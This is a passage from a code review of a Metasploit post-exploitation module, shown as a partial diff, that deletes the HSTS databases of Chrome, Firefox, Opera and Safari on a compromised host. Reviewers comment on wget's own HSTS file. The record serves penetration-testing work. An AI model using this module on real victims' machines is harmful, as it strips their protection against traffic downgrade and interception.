modules/post/multi/manage/hsts_eraser.rb

```diff
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::OSX::System
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Web browsers HSTS entries eraser',
+      'Description' => %q{
+        This module removes the HSTS database of the following web browsers: Mozilla Firefox,
+        Google Chrome, Opera & Safari.
+      },
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
+        ],
+      'Platform'     => %w(linux osx unix win),
+      'References'   =>
+        [
+          [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
+          [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
+  
+        ],
+      'SessionTypes' => %w(meterpreter shell)
+    ))
+  end
+
+  def run
+    profiles = user_profiles
+
+    profiles.each do |user_profile|
+      account = user_profile['UserName']
+      browsers_hsts_db_path = {}
+
+      case session.platform
+      when 'windows'
+        browsers_hsts_db_path = {
+          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
+          'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now
+          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
+        }
+      when 'unix', 'linux'
```

Comment:
FWIW, TIL that `wget` has a similar file; `~/.wget-hsts`, with a format like:

```
# HSTS 1.0 Known Hosts database for GNU Wget.
# Edit at your own risk.
# <hostname>[:<port>]	<incl. subdomains>	<created>	<max-age>
target	0	0	1516403563	15768000
```

Reply:
I think I have that symlinked to `/dev/null`, heh.

Reply:
```
wvu@hiigara:~$ ll .wget-hsts
lrwxrwxrwx 1 wvu wvu 9 Mar  9  2017 .wget-hsts -> /dev/null
wvu@hiigara:~$
```